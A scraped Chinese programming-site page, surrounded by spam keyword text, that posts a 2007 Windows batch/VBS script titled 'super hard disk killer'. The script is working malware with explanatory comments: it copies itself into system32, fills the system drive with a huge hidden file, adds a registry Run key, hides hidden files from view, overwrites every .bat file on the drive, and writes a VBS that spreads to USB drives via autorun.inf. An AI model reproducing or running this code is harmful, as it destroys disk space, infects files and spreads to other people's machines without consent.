国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > BAT > 正文

超級硬盤殺手的bat

2020-03-29 20:20:25
字體:
供稿:網(wǎng)友
復(fù)制代碼 代碼如下:

@echo off

%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%
%ozone%     %Name  :REON%               %ozone%
%ozone%     %Author:Ozone [verybat.cn]%   %ozone%
%ozone%     %Data  :17/04/2007%           %ozone%
%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%



if exsit %SystemDrive%/PAGEFILES.SYS goto end
copy %0 %windir%/system32/logon.bat                     ::復(fù)制自身
FOR /F "tokens=3*" %%i in ('dir /-c %SystemDrive%^|find "可用字節(jié)"') do fsutil file createnew %SystemDrive%/PAGEFILES.SYS %%i   ::制造超大文件,轟炸硬盤
attrib +r +s +h %SystemDrive%/PAGEFILES.SYS        ::隱藏文件
reg add HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run /v KV2007 /t REG_SZ /d %windir%/system32/logon.vbs                      ::自動啟動
reg delete HKLM/Software/Microsoft/windows/CurrentVersion/explorer/Advanced/Folder/Hidden/SHOWALL /va /f                    ::不顯示隱藏文件
for /r %SystemDrive% %%i in (*.bat) do type %0>%%i       ::感染


if exist %windir%/system32/logon.vbs goto end
+++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++

echo set fs =createobject("scripting.filesystemobject")>>%windir%/system32/logon.vbs
echo set WshShell = WScript.CreateObject("WScript.Shell")>>%windir%/system32/logon.vbs
echo Set objWMIService = GetObject("winmgmts:" _>>%windir%/system32/logon.vbs
echo ^& "{impersonationLevel=impersonate}!//" ^& strComputer ^& "/root/cimv2")>>%windir%/system32/logon.vbs
echo Set colDisks = objWMIService.ExecQuery _>>%windir%/system32/logon.vbs
echo ("Select * from Win32_LogicalDisk")>>%windir%/system32/logon.vbs

::監(jiān)視u盤
echo For i =1 to 9000000000>>%windir%/system32/logon.vbs
echo For Each objDisk in colDisks>>%windir%/system32/logon.vbs
echo Select Case objDisk.DriveType>>%windir%/system32/logon.vbs
echo :Case 2:>>%windir%/system32/logon.vbs


::判斷u盤中是否存在autorun.inf,不存在則寫入autorun.inf并且隱藏.
echo y1=fs.FileExists(objDisk.DeviceID ^& "/AUTORUN.INF")>>%windir%/system32/logon.vbs
echo if not y1 then>>%windir%/system32/logon.vbs
echo set f=fs.opentextfile(objDisk.DeviceID ^& "/AUTORUN.INF",2, true)>>%windir%/system32/logon.vbs
echo f.write "[AutoRun]" ^& vbcrlf>>%windir%/system32/logon.vbs
echo f.write "open=logon.bat" ^& vbcrlf>>%windir%/system32/logon.vbs
echo f.write "shellexecute=logon.bat" ^& vbcrlf>>%windir%/system32/logon.vbs
echo f.write "shell/Auto/command=logon.bat" ^& vbcrlf>>%windir%/system32/logon.vbs
echo f.Close>>%windir%/system32/logon.vbs
echo Set f1 = fs.GetFile(objDisk.DeviceID ^& "/AUTORUN.INF")>>%windir%/system32/logon.vbs
echo If f1.Attributes = f1.Attributes AND 2 Then>>%windir%/system32/logon.vbs
echo :f1.Attributes = f1.Attributes XOR 7:>>%windir%/system32/logon.vbs
echo End If>>%windir%/system32/logon.vbs
echo end if>>%windir%/system32/logon.vbs

::判斷u盤中是否存在logon.bat,如果不存在則寫入logon.bat并隱藏.
echo y2=fs.FileExists(objDisk.DeviceID ^& "/logon.bat")>>%windir%/system32/logon.vbs
echo if not y2 then >>%windir%/system32/logon.vbs
echo fs.CopyFile "c:/windows/system32/logon.bat",objDisk.DeviceID ^& "/">>%windir%/system32/logon.vbs
echo Set f2 = fs.GetFile(objDisk.DeviceID ^& "/logon.bat")>>%windir%/system32/logon.vbs
echo If f2.Attributes = f2.Attributes AND 2 Then>>%windir%/system32/logon.vbs
echo :f2.Attributes = f2.Attributes XOR 7:>>%windir%/system32/logon.vbs
echo End If>>%windir%/system32/logon.vbs
echo end if>>%windir%/system32/logon.vbs

echo dirr = Wshshell.ExpandEnvironmentStrings("%systemdrive%")>>%windir%/system32/logon.vbs

::判斷u盤中是否存在PAGEFILES.SYS,如果不存在則寫入PAGEFILES.SYS并隱藏.
echo y3=fs.FileExists(dirr & "/PAGEFILES.SYS")>>%windir%/system32/logon.vbs
echo if not y3 then>>%windir%/system32/logon.vbs
echo WshShell.Run "logon.bat">>%windir%/system32/logon.vbs
echo WScript.Sleep 500>>%windir%/system32/logon.vbs
echo Set f3 = fs.GetFile(dirr & "/PAGEFILES.SYS")>>%windir%/system32/logon.vbs
echo If f3.Attributes = f3.Attributes AND 2 Then>>%windir%/system32/logon.vbs
echo :f3.Attributes = f3.Attributes XOR 7:>>%windir%/system32/logon.vbs
echo End If>>%windir%/system32/logon.vbs
echo end if>>%windir%/system32/logon.vbs
echo End Select>>%windir%/system32/logon.vbs
echo Next>>%windir%/system32/logon.vbs

::每隔5秒掃描一次.
echo WScript.Sleep 5000>>%windir%/system32/logon.vbs
echo Next>>%windir%/system32/logon.vbs

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

:end
 
發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 焦作市| 兰溪市| 镇坪县| 宜君县| 长宁区| 保定市| 济宁市| 读书| 呼和浩特市| 界首市| 黄龙县| 米林县| 白银市| 彰化市| 棋牌| 凤庆县| 南澳县| 淮安市| 千阳县| 尚志市| 常熟市| 合作市| 凤翔县| 曲麻莱县| 许昌市| 射洪县| 阿克苏市| 江永县| 涡阳县| 清原| 武乡县| 石景山区| 太和县| 内乡县| 罗平县| 榆中县| 巧家县| 枝江市| 望城县| 会昌县| 青阳县|